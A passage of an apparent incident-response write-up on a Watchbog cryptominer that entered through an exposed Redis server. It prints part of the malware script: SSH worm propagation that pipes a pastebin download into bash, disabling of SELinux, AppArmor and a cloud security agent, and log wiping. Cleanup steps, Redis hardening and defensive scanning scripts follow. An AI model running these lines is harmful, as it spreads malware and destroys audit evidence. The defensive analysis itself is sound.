  pgrep -f KHdnZXQgLXFPLSBodHRw | xargs -I % kill -9 %
  pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3 | xargs -I % kill -9 %
  pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo | xargs -I % kill -9 %
  pgrep -f mwyumwdbpq.conf | xargs -I % kill -9 %
  pgrep -f honvbsasbf.conf | xargs -I % kill -9 %
  pgrep -f mqdsflm.cf | xargs -I % kill -9 %
  pgrep -f stratum | xargs -I % kill -9 %
  pgrep -f lower.sh | xargs -I % kill -9 %
  pgrep -f ./ppp | xargs -I % kill -9 %
  pgrep -f cryptonight | xargs -I % kill -9 %
  pgrep -f ./seervceaess | xargs -I % kill -9 %
  pgrep -f ./servceaess | xargs -I % kill -9 %
  pgrep -f ./servceas | xargs -I % kill -9 %
  pgrep -f ./servcesa | xargs -I % kill -9 %
  pgrep -f ./vsp | xargs -I % kill -9 %
  pgrep -f ./jvs | xargs -I % kill -9 %
  pgrep -f ./pvv | xargs -I % kill -9 %
  pgrep -f ./vpp | xargs -I % kill -9 %
  pgrep -f ./pces | xargs -I % kill -9 %
  pgrep -f ./rspce | xargs -I % kill -9 %
  pgrep -f ./haveged | xargs -I % kill -9 %
  pgrep -f ./jiba | xargs -I % kill -9 %
  pgrep -f ./watchbog | xargs -I % kill -9 %
  pgrep -f ./A7mA5gb | xargs -I % kill -9 %
  pgrep -f kacpi_svc | xargs -I % kill -9 %
  pgrep -f kswap_svc | xargs -I % kill -9 %
  pgrep -f kauditd_svc | xargs -I % kill -9 %
  pgrep -f kpsmoused_svc | xargs -I % kill -9 %
  pgrep -f kseriod_svc | xargs -I % kill -9 %
  pgrep -f kthreadd_svc | xargs -I % kill -9 %
  pgrep -f ksoftirqd_svc | xargs -I % kill -9 %
  pgrep -f kintegrityd_svc | xargs -I % kill -9 %
  pgrep -f jawa | xargs -I % kill -9 %
  pgrep -f oracle.jpg | xargs -I % kill -9 %
  pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN | xargs -I % kill -9 %
  pgrep -f 188.209.49.54 | xargs -I % kill -9 %
  pgrep -f 181.214.87.241 | xargs -I % kill -9 %
  pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ | xargs -I % kill -9 %
  pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 %
  pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 %
  pgrep -f servim | xargs -I % kill -9 %
  pgrep -f kblockd_svc | xargs -I % kill -9 %
  pgrep -f native_svc | xargs -I % kill -9 %
  pgrep -f ynn | xargs -I % kill -9 %
  pgrep -f 65ccEJ7 | xargs -I % kill -9 %
  pgrep -f jmxx | xargs -I % kill -9 %
  pgrep -f 2Ne80nA | xargs -I % kill -9 %
  pgrep -f sysstats | xargs -I % kill -9 %
  pgrep -f systemxlv | xargs -I % kill -9 %
  pgrep -f watchbog | xargs -I % kill -9 %
  pgrep -f OIcJi1m | xargs -I % kill -9 %
  pkill -f biosetjenkins
  pkill -f Loopback
  pkill -f apaceha
  pkill -f cryptonight
  pkill -f stratum
  pkill -f mixnerdx
  pkill -f performedl
  pkill -f JnKihGjn
  pkill -f irqba2anc1
  pkill -f irqba5xnc1
  pkill -f irqbnc1
  pkill -f ir29xc1
  pkill -f conns
  pkill -f irqbalance
  pkill -f crypto-pool
  pkill -f XJnRj
  pkill -f mgwsl
  pkill -f pythno
  pkill -f jweri
  pkill -f lx26
  pkill -f NXLAi
  pkill -f BI5zj
  pkill -f askdljlqw
  pkill -f minerd
  pkill -f minergate
  pkill -f Guard.sh
  pkill -f ysaydh
  pkill -f bonns
  pkill -f donns
  pkill -f kxjd
  pkill -f Duck.sh
  pkill -f bonn.sh
  pkill -f conn.sh
  pkill -f kworker34
  pkill -f kw.sh
  pkill -f pro.sh
  pkill -f polkitd
  pkill -f acpid
  pkill -f icb5o
  pkill -f nopxi
  pkill -f irqbalanc1
  pkill -f minerd
  pkill -f i586
  pkill -f gddr
  pkill -f mstxmr
  pkill -f ddg.2011
  pkill -f wnTKYg
  pkill -f deamon
  pkill -f disk_genius
  pkill -f sourplum
  pkill -f polkitd
  pkill -f nanoWatch
  pkill -f zigw
  pkill -f devtool
  pkill -f devtools
  pkill -f systemctI
  pkill -f watchbog
  pkill -f cryptonight
  pkill -f sustes
  pkill -f xmrig
  pkill -f xmrig-cpu
  pkill -f 121.42.151.137
  pkill -f init12.cfg
  pkill -f nginxk
  pkill -f tmp/wc.conf
  pkill -f xmrig-notls
  pkill -f xmr-stak
  pkill -f suppoie
  pkill -f zer0day.ru
  pkill -f dbus-daemon--system
  pkill -f nullcrew
  pkill -f systemctI
  pkill -f kworkerds
  pkill -f init10.cfg
  pkill -f /wl.conf
  pkill -f crond64
  pkill -f sustse
  pkill -f vmlinuz
  pkill -f exin
  pkill -f apachiii
  pkill -f networkservics
  rm -rf /usr/bin/config.json
  rm -rf /usr/bin/exin
  rm -rf /tmp/wc.conf
  rm -rf /tmp/log_rot
  rm -rf /tmp/apachiii
  rm -rf /tmp/sustse
  rm -rf /tmp/php
  rm -rf /tmp/p2.conf
  rm -rf /tmp/pprt
  rm -rf /tmp/ppol
  rm -rf /tmp/javax/config.sh
  rm -rf /tmp/javax/sshd2
  rm -rf /tmp/.profile
  rm -rf /tmp/1.so
  rm -rf /tmp/kworkerds
  rm -rf /tmp/kworkerds3
  rm -rf /tmp/kworkerdssx
  rm -rf /tmp/xd.json
  rm -rf /tmp/syslogd
  rm -rf /tmp/syslogdb
  rm -rf /tmp/65ccEJ7
  rm -rf /tmp/jmxx
  rm -rf /tmp/2Ne80nA
  rm -rf /tmp/dl
  rm -rf /tmp/ddg
  rm -rf /tmp/systemxlv
  rm -rf /tmp/systemctI
  rm -rf /tmp/.abc
  rm -rf /tmp/osw.hb
  rm -rf /tmp/.tmpleve
  rm -rf /tmp/.tmpnewzz
  rm -rf /tmp/.java
  rm -rf /tmp/.omed
  rm -rf /tmp/.tmpc
  rm -rf /tmp/.tmpleve
  rm -rf /tmp/.tmpnewzz
  rm -rf /tmp/gates.lod
  rm -rf /tmp/conf.n
  rm -rf /tmp/devtool
  rm -rf /tmp/devtools
  rm -rf /tmp/fs
  rm -rf /tmp/.rod
  rm -rf /tmp/.rod.tgz
  rm -rf /tmp/.rod.tgz.1
  rm -rf /tmp/.rod.tgz.2
  rm -rf /tmp/.mer
  rm -rf /tmp/.mer.tgz
  rm -rf /tmp/.mer.tgz.1
  rm -rf /tmp/.hod
  rm -rf /tmp/.hod.tgz
  rm -rf /tmp/.hod.tgz.1
  rm -rf /tmp/84Onmce
  rm -rf /tmp/C4iLM4L
  rm -rf /tmp/lilpip
  rm -rf /tmp/3lmigMo
  rm -rf /tmp/am8jmBP
  rm -rf /tmp/tmp.txt
  rm -rf /tmp/baby
  rm -rf /tmp/.lib
  rm -rf /tmp/systemd
  rm -rf /tmp/lib.tar.gz
  rm -rf /tmp/baby
  rm -rf /tmp/java
  rm -rf /tmp/j2.conf
  rm -rf /tmp/.mynews1234
  rm -rf /tmp/a3e12d
  rm -rf /tmp/.pt
  rm -rf /tmp/.pt.tgz
  rm -rf /tmp/.pt.tgz.1
  rm -rf /tmp/go
  rm -rf /tmp/java
  rm -rf /tmp/j2.conf
  rm -rf /tmp/.tmpnewasss
  rm -rf /tmp/java
  rm -rf /tmp/go.sh
  rm -rf /tmp/go2.sh
  rm -rf /tmp/khugepageds
  rm -rf /tmp/.censusqqqqqqqqq
  rm -rf /tmp/.kerberods
  rm -rf /tmp/kerberods
  rm -rf /tmp/seasame
  rm -rf /tmp/touch
  rm -rf /tmp/.p
  rm -rf /tmp/runtime2.sh
  rm -rf /tmp/runtime.sh
  rm -rf /dev/shm/z3.sh
  rm -rf /dev/shm/z2.sh
  rm -rf /dev/shm/.scr
  rm -rf /dev/shm/.kerberods
  rm -f /etc/ld.so.preload
  rm -f /usr/local/lib/libioset.so
  chattr -i /etc/ld.so.preload
  rm -f /etc/ld.so.preload
  rm -f /usr/local/lib/libioset.so
  rm -rf /tmp/watchdogs
  rm -rf /etc/cron.d/tomcat
  rm -rf /etc/rc.d/init.d/watchdogs
  rm -rf /usr/sbin/watchdogs
  rm -f /tmp/kthrotlds
  rm -f /etc/rc.d/init.d/kthrotlds
  rm -rf /tmp/.sysbabyuuuuu12
  rm -rf /tmp/logo9.jpg
  rm -rf /tmp/miner.sh
  rm -rf /tmp/nullcrew
  rm -rf /tmp/proc
  rm -rf /tmp/2.sh
  rm /opt/atlassian/confluence/bin/1.sh
  rm /opt/atlassian/confluence/bin/1.sh.1
  rm /opt/atlassian/confluence/bin/1.sh.2
  rm /opt/atlassian/confluence/bin/1.sh.3
  rm /opt/atlassian/confluence/bin/3.sh
  rm /opt/atlassian/confluence/bin/3.sh.1
  rm /opt/atlassian/confluence/bin/3.sh.2
  rm /opt/atlassian/confluence/bin/3.sh.3
  rm -rf /var/tmp/f41
  rm -rf /var/tmp/2.sh
  rm -rf /var/tmp/config.json
  rm -rf /var/tmp/xmrig
  rm -rf /var/tmp/1.so
  rm -rf /var/tmp/kworkerds3
  rm -rf /var/tmp/kworkerdssx
  rm -rf /var/tmp/kworkerds
  rm -rf /var/tmp/wc.conf
  rm -rf /var/tmp/nadezhda.
  rm -rf /var/tmp/nadezhda.arm
  rm -rf /var/tmp/nadezhda.arm.1
  rm -rf /var/tmp/nadezhda.arm.2
  rm -rf /var/tmp/nadezhda.x86_64
  rm -rf /var/tmp/nadezhda.x86_64.1
  rm -rf /var/tmp/nadezhda.x86_64.2
  rm -rf /var/tmp/sustse3
  rm -rf /var/tmp/sustse
  rm -rf /var/tmp/moneroocean/
  rm -rf /var/tmp/devtool
  rm -rf /var/tmp/devtools
  rm -rf /var/tmp/play.sh
  rm -rf /var/tmp/systemctI
  rm -rf /var/tmp/.java
  rm -rf /var/tmp/1.sh
  rm -rf /var/tmp/conf.n
  rm -r /var/tmp/lib
  rm -r /var/tmp/.lib
  chattr -iau /tmp/lok
  chmod 700 /tmp/lok
  rm -rf /tmp/lok
  sleep 1
  chattr -i /tmp/kdevtmpfsi
  echo 1 > /tmp/kdevtmpfsi
  chattr +i /tmp/kdevtmpfsi
  sleep 1
  chattr -i /tmp/redis2
  echo 1 > /tmp/redis2
  chattr +i /tmp/redis2
  sleep 1
  chattr -i /usr/lib/systemd/systemd-update-daily
  echo 1 > /usr/lib/systemd/systemd-update-daily
  chattr +i /usr/lib/systemd/systemd-update-daily
  #yum install -y docker.io || apt-get install docker.io;
  docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %
  docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %
  docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill %
  docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %
  docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %
  docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %
  docker ps | grep "monero" | awk '{print $1}' | xargs -I % docker kill %
  docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %
  docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %
  docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %
  docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %
  docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %
  docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %
  docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %
  docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %
  docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %
  docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %
  docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %
  docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %
  docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %
  docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %
  docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %
  echo SELINUX=disabled >/etc/selinux/config
  service apparmor stop
  systemctl disable apparmor
  service aliyun.service stop
  systemctl disable aliyun.service
  ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %
  ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %
}

kill_sus_proc()
{
  ps axf -o "pid"|while read procid
  do
    ls -l /proc/$procid/exe | grep /tmp
    if [ $? -ne 1 ]
    then
      cat /proc/$procid/cmdline| grep -a -E "JavaUpdates"
      if [ $?
-ne 0 ] 750 then 751 kill -9 $procid 752 else 753 echo "don't kill" 754 fi 755 fi 756 done 757 ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid 758 do 759 cat /proc/$procid/cmdline| grep -a -E "JavaUpdates" 760 if [ $? -ne 0 ] 761 then 762 kill -9 $procid 763 else 764 echo "don't kill" 765 fi 766 done 767 } 768 769 if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then 770 for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/UhUmR517||wget -q -O - https://pastebin.com/raw/UhUmR517)|base64 -d|bash >/dev/null 2>&1 &' & done 771 fi 772 773 kill_miner_proc 774 kill_sus_proc 775 776 function upgradeday() { 777 if [ "$me" != "root" ];then 778 bug_path="/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/" 779 else 780 bug_path="/bin/" 781 fi 782 if [ -f "$bug_path/JavaUpdates" ]; then 783 cd $bug_path 784 $check_type=$(./JavaUpdates -V|grep 'xmr-stak'|wc -l) 785 if [ ${check_type} -ne 0 ];then 786 $check_type_b=$(./JavaUpdates -V|grep '1.0.4-rx'|wc -l) 787 if [ ${check_type_b} -eq 0 ];then 788 cleanoldpack 789 fi 790 else 791 $check_type_a=$(./JavaUpdates -V|grep 'XMRig'|wc -l) 792 if [ ${check_type_a} -ne 0 ];then 793 $check_type_b=$(./JavaUpdates -V|grep '5.3.0'|wc -l) 794 if [ ${check_type_b} -eq 0 ];then 795 cleanoldpack 796 fi 797 else 798 cleanoldpack 799 fi 800 fi 801 else 802 cleanoldpack 803 fi 804 } 805 if [ "$me" != "root" ];then 806 pz=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 807 if [ ${pz} -ne 0 ];then 808 crontab -r 809 cronlow 810 else 811 download 812 crontab -r 813 cronlow 814 sleep 15 815 pm=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 816 if [ ${pm} -eq 0 ];then 817 testa 818 fi 819 prt=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 820 if [ ${prt} -ne 0 ];then 821 if [ ! 
-f "/tmp/.tmpc" ]; then 822 finished "$deep" 823 fi 824 fi 825 fi 826 else 827 pz=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 828 if [ ${pz} -ne 0 ];then 829 system 830 cronhigh 831 else 832 system 833 cronhigh 834 download 835 sleep 15 836 pm=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 837 if [ ${pm} -ne 0 ];then 838 if [ ! -f "/tmp/.tmpc" ]; then 839 finished "$surf" 840 fi 841 fi 842 sleep 30 843 if [ ${pm} -eq 0 ];then 844 testa 845 if [ ${pm} -ne 0 ];then 846 finished "$surf" 847 fi 848 fi 849 if [ ${pm} -eq 0 ];then 850 download 851 if [ ${pm} -ne 0 ];then 852 finished "$deep" 853 fi 854 fi 855 if [ ${pm} -eq 0 ];then 856 testa 857 if [ ${pm} -ne 0 ];then 858 finished "$deep" 859 fi 860 fi 861 fi 862 echo 0>/var/log/secure 863 echo 0>/var/log/cron 864 sed -i '/pastebin/d' /var/log/syslog 865 sed -i '/github/d' /var/log/syslog 866 fi 867 # 868 cronbackup 869 # 870 cronrc 871 # 872 px=$(ps -fe|grep 'JavaUpdates'|grep -v grep|wc -l) 873 if [ ${px} -gt 1 ];then 874 ps auxf|grep -v grep|grep "JavaUpdates" | awk '{print $2}'|xargs kill -9 875 fi 876 if [ `whoami` = "root" ];then 877 (curl -fsSL https://pastebin.com/raw/HS6SqV7w||wget -q -O - https://pastebin.com/raw/HS6SqV7w)|base64 -d|bash 878 fi 879 #
Part Two: Cleaning up Watchdogs
2.0.0 The parts of this infection that need cleaning up are:
1) Block or redirect the third-party code-hosting addresses at the firewall.
2) Remove the cron jobs that download the shell script, together with the cron-related files and directories.
3) Delete the malicious commands and packages, and rename the system commands the script abuses.
4) Clean up the JavaUpdates mining process.
5) Repair and harden the Redis instance through which this host was compromised.
2.0.1 Block or redirect the third-party code-hosting addresses at the firewall.
cat /etc/hosts
vim /etc/hosts
127.0.0.1 pastebin.com sadan666.xyz
This redirects the third-party addresses to localhost, but when I reopened /etc/hosts in vim the entry had not been written, which is odd, so skip the hosts approach for now.
Ping pastebin.com and sadan666.xyz to get their IPs, and add those IPs to the firewall.

iptables -A INPUT -s 104.23.98.190 -j DROP
iptables -A OUTPUT -s 104.23.98.190 -j DROP
iptables -A OUTPUT -j DROP -d 104.23.98.190
iptables -A INPUT -s 104.236.66.189 -j DROP
iptables -A OUTPUT -s 104.236.66.189 -j DROP
iptables -A OUTPUT -j DROP -d 104.236.66.189
On CentOS, persist the rules with: iptables-save
Checking the result:

2.0.2 Remove the cron jobs that download the shell script, together with the cron-related files and directories.
2.0.2.1 List and delete the cron jobs
List: crontab -l
Delete: crontab -r
The schedule */9 * * * * runs the job every 9 minutes, and what it runs is a fetch of the shell script from the third-party addresses.
2.0.2.2 After deleting with crontab -r, list again; "no crontab for root" means there are currently no cron jobs for root.
2.0.2.3 Then check each of the following locations in turn for hidden commands and jobs:
/etc/cron.d
/etc/cron.deny
/etc/cron.monthly
/etc/cron.daily
/etc/cron.hourly
/etc/crontab
/etc/cron.weekly
For example, in /etc/cron.d:
cd /etc/cron.d
ll
vim /etc/cron.d/apache
vim /etc/cron.d/root
vim /etc/cron.d/system
Delete the */7 * * * * cron lines found in them.

2.0.2.4 /etc/crontab also contained hidden entries; delete the lines for the hidden commands httpntp and ftpsdns.

2.0.2.5 Inspect and delete the malicious commands /bin/httpntp, /bin/ftpsdns and /usr/bin/watchbog
vim /bin/httpntp
vim /bin/ftpsdns
vim /usr/bin/watchbog
2.0.2.6 And finally the .bashrc file found at the very start.
cd ~
vim .bashrc
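Checking every cron location and startup file by hand, as above, is easy to get wrong when the script keeps re-writing them. The scan below is an added example, not code from the original post or from the malware: it greps the cron directories, root's crontab spool and root's shell startup files for the indicators this incident used (the pastebin and sadan666 hosts, the httpntp/ftpsdns/watchbog names, the JavaUpdates miner, and any "pipe into bash" construct). The indicator list, the file layout and the ROOT prefix are assumptions; the fixture it builds for its self-check is constructed, not copied from a real host.

```shell
#!/bin/sh
# Added example (not from the original post): read-only scan of cron and
# shell-startup persistence points for the indicators seen in this incident.
# INDICATORS is an assumed list assembled from the page's own IoCs.

INDICATORS='pastebin\.com|sadan666\.xyz|/bin/httpntp|/bin/ftpsdns|watchbog|JavaUpdates|[|][[:space:]]*bash'

# cron_candidates ROOT: print every existing candidate file under ROOT
# ("" for the live system), one path per line.
cron_candidates() {
    root="$1"
    for f in "$root/etc/crontab" \
             "$root"/etc/cron.d/* "$root"/etc/cron.hourly/* \
             "$root"/etc/cron.daily/* "$root"/etc/cron.weekly/* \
             "$root"/etc/cron.monthly/* "$root"/var/spool/cron/* \
             "$root"/var/spool/cron/crontabs/* \
             "$root/root/.bashrc" "$root/root/.profile"; do
        [ -f "$f" ] && printf '%s\n' "$f"
    done
    return 0
}

# scan_cron_persistence ROOT: print "file:lineno:text" for every matching
# line. Nothing is deleted; the operator decides what to remove.
scan_cron_persistence() {
    cron_candidates "${1:-}" | while IFS= read -r f; do
        grep -nE "$INDICATORS" "$f" 2>/dev/null | sed "s|^|$f:|"
    done
    return 0
}

# Constructed fixture for a self-check: a fake root with one benign hourly
# job and the three persistence points this write-up describes. The pastebin
# path is a placeholder, not the real paste.
build_sample_root() {
    d=$(mktemp -d)
    mkdir -p "$d/etc/cron.d" "$d/etc/cron.hourly" "$d/root"
    printf '0 1 * * * root /bin/httpntp\n' > "$d/etc/crontab"
    printf '*/7 * * * * root (curl -fsSL https://pastebin.com/raw/PLACEHOLDER||wget -q -O - https://pastebin.com/raw/PLACEHOLDER)|bash\n' \
        > "$d/etc/cron.d/system"
    printf '#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n' > "$d/etc/cron.hourly/logrotate"
    printf 'export PATH\n(curl -fsSLk sadan666.xyz:9080/rr -m 90)|bash\n' > "$d/root/.bashrc"
    printf '%s\n' "$d"
}

# Usage on a live host (as root): scan_cron_persistence ""
# Self-check against the constructed fixture: sh scan.sh --demo
if [ "${1:-}" = "--demo" ]; then
    r=$(build_sample_root)
    scan_cron_persistence "$r"
    rm -rf "$r"
fi
```

The scan reports matches with file and line number so each hit can be reviewed before deletion; in this incident the same entry reappears if the downloader is still running, so run it again after the processes in 2.0.4 have been killed.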
2.0.3 Delete the malicious commands and packages, and rename the system commands the script abuses.
The shell script uses curl and wget to pull its payloads, so rename curl and wget; the new names are the old ones spelled backwards.
mv /usr/bin/curl /usr/bin/lruc
mv /usr/bin/wget /usr/bin/tegw
2.0.4 Clean up the JavaUpdates mining process.
2.0.4.1 Kill the mining processes:
ps -ef|grep watchbog|awk '{print $2}'|xargs kill -9
ps -ef|grep JavaUpdates|awk '{print $2}'|xargs kill -9
Search for both watchbog and JavaUpdates, even though the miner process currently running on this system is JavaUpdates.

2.0.4.2 After killing the processes above, CPU usage dropped back to 1%, but a pnscan trojan process was still running.

Use top to find the pid of pnscan
kill -9 pid
ps aux|grep pnscan
rm -rf pnscan (delete its directory)
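Finding pnscan only after the CPU dropped shows the limit of hunting by process name. The malware's own kill_sus_proc (in the script above) decides what to kill by checking whether /proc/PID/exe points into /tmp; the example below, added here and not part of the original post, turns that same heuristic around for defensive triage: it lists every process whose executable lives in a world-writable scratch directory or has been deleted from disk, and kills nothing. The scratch-directory list and the PROC parameter (so the check can run against a constructed /proc copy) are assumptions; the fixture is constructed.

```shell
#!/bin/sh
# Added example (not from the original post): read-only process triage.
# Flags processes whose executable is under /tmp, /var/tmp or /dev/shm, or
# whose binary has been unlinked (readlink reports "... (deleted)"), both
# common for miners that are dropped into and run from scratch space.

SCRATCH_DIRS='/tmp /var/tmp /dev/shm'   # assumed list; extend per host

# exe_is_suspicious PATH: PATH is what readlink returns for /proc/PID/exe.
# Returns 0 (true) if it is in a scratch dir or marked deleted.
exe_is_suspicious() {
    exe="$1"
    case "$exe" in
        *" (deleted)") return 0 ;;
    esac
    for d in $SCRATCH_DIRS; do
        case "$exe" in
            "$d"/*) return 0 ;;
        esac
    done
    return 1
}

# list_suspicious_procs PROC: one "pid<TAB>exe<TAB>comm" line per hit.
# PROC defaults to /proc; readlink needs root to see other users' processes.
list_suspicious_procs() {
    proc="${1:-/proc}"
    for p in "$proc"/[0-9]*; do
        [ -d "$p" ] || continue
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        if exe_is_suspicious "$exe"; then
            comm=$(cat "$p/comm" 2>/dev/null)
            printf '%s\t%s\t%s\n' "${p##*/}" "$exe" "$comm"
        fi
    done
    return 0
}

# Constructed fixture: a fake /proc with two miner-like entries (a binary
# run from /tmp under a kernel-thread-style name, and a deleted JavaUpdates)
# plus two legitimate daemons. PIDs and paths are made up for the demo.
build_sample_proc() {
    d=$(mktemp -d)
    mkdir -p "$d/1" "$d/4242" "$d/4243" "$d/4244"
    ln -s /usr/lib/systemd/systemd "$d/1/exe";            printf 'systemd\n'     > "$d/1/comm"
    ln -s /tmp/kworkerds "$d/4242/exe";                   printf 'kworkerds\n'   > "$d/4242/comm"
    ln -s "/usr/bin/JavaUpdates (deleted)" "$d/4243/exe"; printf 'JavaUpdates\n' > "$d/4243/comm"
    ln -s /usr/sbin/sshd "$d/4244/exe";                   printf 'sshd\n'        > "$d/4244/comm"
    printf '%s\n' "$d"
}

# Usage on a live host (as root): list_suspicious_procs /proc
# Self-check against the constructed fixture: sh triage.sh --demo
if [ "${1:-}" = "--demo" ]; then
    p=$(build_sample_proc)
    list_suspicious_procs "$p"
    rm -rf "$p"
fi
```

A hit is a lead, not a verdict: confirm with `cat /proc/PID/cmdline` and `ls -l /proc/PID/cwd` before killing, and copy the binary out of /tmp first if you want a sample, since the cleanup script above deletes its own droppings.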

2.0.5 Repair and harden the Redis instance through which this host was compromised.
The real cause of this compromise was that Redis had no password set and that redis.conf had bind commented out (#bind 127.0.0.1), so it was not restricted to the local machine and was effectively exposed to the public internet.
With no password, anyone can read all of the data in that Redis instance. The attacker used Redis's own CONFIG command to read and write files, wrote their SSH public key into the authorized_keys file under /root/.ssh on the target server, and could then log straight in over SSH with the matching private key.
2.0.5.1 The changes made:
1) Set a password in Redis and change the port.
#requirepass foobared
requirepass password
#port 6379
port 9736

2) Edit redis.conf to disable remote changes to the DB file location.
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""

3) Optionally, refuse Redis connections from any machine other than localhost.
bind 127.0.0.1
4) Run the Redis service as a low-privilege user.
groupadd -r redis && useradd -r -g redis redis
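The four settings above are exactly the ones that let the attacker in, so they are worth checking mechanically on every Redis host rather than once by hand. The audit below is an added example, not code from the original post: it reads a redis.conf and reports each of the weak states described in 2.0.5 (no requirepass, bind missing or wildcard, CONFIG still callable, default port), plus an explicit protected-mode no, which is not in the post. The two sample configs it builds are constructed; the "weak" one mirrors the state this host was found in, and the password value in the hardened one is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original post): audit a redis.conf for the
# misconfigurations that made this intrusion possible. Prints one finding
# per line and nothing when the file passes.

# audit_redis_conf FILE: one finding per line on stdout; always returns 0.
audit_redis_conf() {
    conf="$1"
    # Active (uncommented) requirepass with a non-empty value.
    if ! grep -qE '^[[:space:]]*requirepass[[:space:]]+[^[:space:]]+' "$conf"; then
        echo "no requirepass: any client that can reach the port has full access"
    fi
    # A commented-out bind (as on this host) means every interface.
    if ! grep -qE '^[[:space:]]*bind[[:space:]]+' "$conf" \
       || grep -qE '^[[:space:]]*bind[[:space:]].*0\.0\.0\.0' "$conf"; then
        echo "bind missing or 0.0.0.0: Redis listens on all interfaces"
    fi
    # CONFIG SET dir/dbfilename is how the SSH key was written to /root/.ssh.
    if ! grep -qE '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]+""' "$conf"; then
        echo "CONFIG command still enabled: clients can rewrite dir and dbfilename"
    fi
    if grep -qE '^[[:space:]]*port[[:space:]]+6379([[:space:]]|$)' "$conf"; then
        echo "default port 6379: first port every Redis scanner tries"
    fi
    # Redis 3.2+ refuses non-loopback clients without auth unless this is off.
    if grep -qE '^[[:space:]]*protected-mode[[:space:]]+no' "$conf"; then
        echo "protected-mode no: built-in exposure guard disabled"
    fi
    return 0
}

# Constructed fixtures: weak.conf is the state described in 2.0.5,
# hardened.conf applies the four changes from 2.0.5.1.
write_sample_confs() {
    d=$(mktemp -d)
    cat > "$d/weak.conf" <<'EOF'
#bind 127.0.0.1
port 6379
#requirepass foobared
EOF
    cat > "$d/hardened.conf" <<'EOF'
bind 127.0.0.1
port 9736
requirepass CHANGE-ME-long-random-secret
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""
EOF
    printf '%s\n' "$d"
}

# Usage on a live host: audit_redis_conf /etc/redis.conf
# Self-check against the constructed fixtures: sh audit.sh --demo
if [ "${1:-}" = "--demo" ]; then
    d=$(write_sample_confs)
    echo "== weak.conf";     audit_redis_conf "$d/weak.conf"
    echo "== hardened.conf"; audit_redis_conf "$d/hardened.conf"
    rm -rf "$d"
fi
```

The rename-command CONFIG "" check is the important one for this incident: a password alone stops casual access, but any client that does obtain the password can still use CONFIG SET dir and dbfilename to drop a file wherever the Redis user can write, which is why step 4 (a dedicated low-privilege redis user) matters as well.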
2.0.6 From my past experience, the SSH login port should also be changed.
This keeps the miner operators from brute-forcing weak passwords on port 22; open the new port first and only then close port 22.
vi /etc/ssh/sshd_config
Port xxxx
Reload the sshd_config configuration:
service sshd restart
